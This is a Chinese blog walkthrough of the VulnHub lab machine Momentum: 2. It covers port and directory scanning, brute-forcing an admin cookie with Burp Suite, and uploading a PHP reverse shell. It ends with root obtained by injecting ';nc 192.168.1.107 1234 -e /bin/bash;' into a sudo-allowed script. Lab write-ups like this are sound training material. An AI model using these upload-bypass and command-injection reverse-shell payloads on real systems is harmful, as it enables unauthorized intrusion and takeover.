IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> VulnHub靶机_MOMENTUM: 2 -> 正文阅读

[PHP知识库]VulnHub靶机_MOMENTUM: 2

靶机介绍

这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1
下载地址:http://www.vulnhub.com/entry/momentum-2,702/
难度:中等
描述:关键词curl, bash, code review

渗透过程

靶机IP获取

靶机的IP为192.168.1.105。

arp-scan -l

在这里插入图片描述

端口扫描

靶机开放了22和80端口。

nmap -A -T4 -p 1-65535 192.168.1.105

在这里插入图片描述

信息收集

  1. 首先扫描以下网站中的特殊文件,这里我一开始用的dirb,但是dirb竟然好多东西没有扫出来,卡住了好久,于是乎用gobuster又扫一遍,这里还要加上.php.bak类型文件,也是绝绝子。
gobuster dir -u http://192.168.1.105/ -x html,php,bak,txt,php.bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

在这里插入图片描述

信息1

访问扫描出的网址:http://192.168.1.105/dashboard.html,可以看到一个文件上传接口。
在这里插入图片描述

信息2

网址http://192.168.1.105/ajax.php.bak 中的代码下载下来,里面的内容是cookie的最后一个字母是额外添加的一个大写字母。然后如果是admin,并且cookie也正确,还需要提交一个post,设置secure等于val1d,就可以上传pdf,php,txt类型的文件,否则只能上传txt文件。
在这里插入图片描述
我们先传一个txt文件,然后查看,发现owl这个目录中出现了我们上传的文件。
在这里插入图片描述
在这里插入图片描述

burpsuite抓包改包

那么,现在的思路就是首先伪造admin的cookie,上传一个php反弹shell的脚本上去。
首先使用burpsuite抓包,先要进行一些设置。

  1. 在kali中启动burpsuite,直接命令行输入burpsuite即可。
  2. 在Proxy下点击Options,看到interface是127.0.0.1:8080。
  3. 在浏览器中的Internet Option中设置相同的IP地址以及端口号。
    在这里插入图片描述
  4. 抓包
    上传kali自带的php-reverse-shell文件(记得改ip为kali的IP),然后查看Proxy——intercept目录下抓到的包,我们点击Action——sendtointruder。点击payload,把cookie那里最后一个字母给爆破出来。爆破就是点击intruder,然后payloads,然后设置26个字母。
    此外,还要使用post方式提交一个参数secure,值为val1d。(爆破成功的话上传回显1)
    在这里插入图片描述

在这里插入图片描述
点击Start attack,查看Response,发现只有R返回值是1。
在这里插入图片描述
5. 改包
把最后Cookie最后一位改成R,然后点击Forward,这时候还没有退出burpsuite的话就一直点Forward就行。
在这里插入图片描述
查看OWL网址就能看见我们上传的脚本了。
在这里插入图片描述
把浏览器网络设置改回来。
在这里插入图片描述

获取shell

nc监听1234端口(php反弹shell脚本中设置的端口)。

nc -lnvp 1234

然后点击owl网址中我们上传的脚本,这样我们就得到了shell。
在这里插入图片描述

提权

信息收集

首先在home目录下得到一个用户名和密码。
用户名:Athena
密码:myvulnerableapp* (Asterisk是*的意思)
在这里插入图片描述

ssh登录

用上述账号和密码登录ssh,查看sudo -l,这里说Athena能够使用的sudo权限中有用python3执行cookie-gen.py这个文件。
在这里插入图片描述
查看cookie-gen.py这个文件。我用nano打开,这里提示没有权限改。分析这个脚本的内容,他会接受一个输入作为seed,然后生成一个cookie。关键是,他会构造一个命令行,并且执行。
在这里插入图片描述
那我们就可以在输入seed的时候构造一下子,去得到root权限的shell。

;nc 192.168.1.107 1234 -e /bin/bash;

在这里插入图片描述
在这里插入图片描述
拿到了第二个flag。
在这里插入图片描述

完结~

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-09-06 10:56:57  更:2021-09-06 10:58:02 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/29 20:46:16-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计